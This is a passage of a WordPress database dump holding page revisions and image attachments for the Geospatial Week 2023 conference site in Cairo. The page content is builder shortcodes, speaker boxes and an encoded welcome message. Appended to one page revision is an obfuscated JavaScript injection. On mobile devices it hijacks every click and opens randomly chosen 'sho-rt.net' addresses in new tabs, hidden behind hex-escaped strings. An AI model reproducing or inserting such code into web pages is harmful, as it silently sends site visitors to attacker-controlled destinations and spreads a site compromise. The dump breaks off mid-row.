link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 18:13:14','2022-10-05 18:13:14','',2167,'https://gsw2023.com/?p=2307',0,'revision','',0),
(2308,1,'2022-10-06 17:38:41','2022-10-06 17:38:41','','mlogo','','inherit','open','closed','','mlogo','','','2022-10-06 17:38:41','2022-10-06 17:38:41','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo.jpg',0,'attachment','image/jpeg',0),
(2309,1,'2022-10-06 17:39:26','2022-10-06 17:39:26','','mlogo','','inherit','open','closed','','mlogo-2','','','2022-10-06 17:39:26','2022-10-06 17:39:26','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo-1.jpg',0,'attachment','image/jpeg',0),
(2310,1,'2022-10-06 17:46:24','2022-10-06 17:46:24','','mlogo','','inherit','open','closed','','mlogo-3','','','2022-10-06 17:46:24','2022-10-06 17:46:24','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo-2.jpg',0,'attachment','image/jpeg',0),
(2311,1,'2022-10-06 17:46:50','2022-10-06 17:46:50','','mlogo','','inherit','open','closed','','mlogo-4','','','2022-10-06 17:46:50','2022-10-06 17:46:50','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo-3.jpg',0,'attachment','image/jpeg',0),
(2312,1,'2022-10-06 17:58:45','2022-10-06 17:58:45','','mlogo','','inherit','open','closed','','mlogo-5','','','2022-10-06 17:58:45','2022-10-06 17:58:45','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo-4.jpg',0,'attachment','image/jpeg',0),
(2313,1,'2022-10-06 18:01:43','2022-10-06 18:01:43','','mlogo','','inherit','open','closed','','mlogo-6','','','2022-10-06 18:01:43','2022-10-06 18:01:43','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo-5.jpg',0,'attachment','image/jpeg',0),
(2314,1,'2022-10-06 18:02:04','2022-10-06 18:02:04','','mlogo','','inherit','open','closed','','mlogo-7','','','2022-10-06 18:02:04','2022-10-06 18:02:04','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo-6.jpg',0,'attachment','image/jpeg',0),
(2315,1,'2022-10-06 18:02:14','2022-10-06 18:02:14','','mlogo','','inherit','open','closed','','mlogo-8','','','2022-10-06 18:02:14','2022-10-06 18:02:14','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo-7.jpg',0,'attachment','image/jpeg',0),
(2316,1,'2022-10-06 18:04:51','2022-10-06 18:04:51','','mlogo','','inherit','open','closed','','mlogo-9','','','2022-10-06 18:04:51','2022-10-06 18:04:51','',0,'https://gsw2023.com/wp-content/uploads/2022/10/mlogo-8.jpg',0,'attachment','image/jpeg',0),
(2317,1,'2022-10-06 19:23:43','2022-10-06 19:23:43','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlM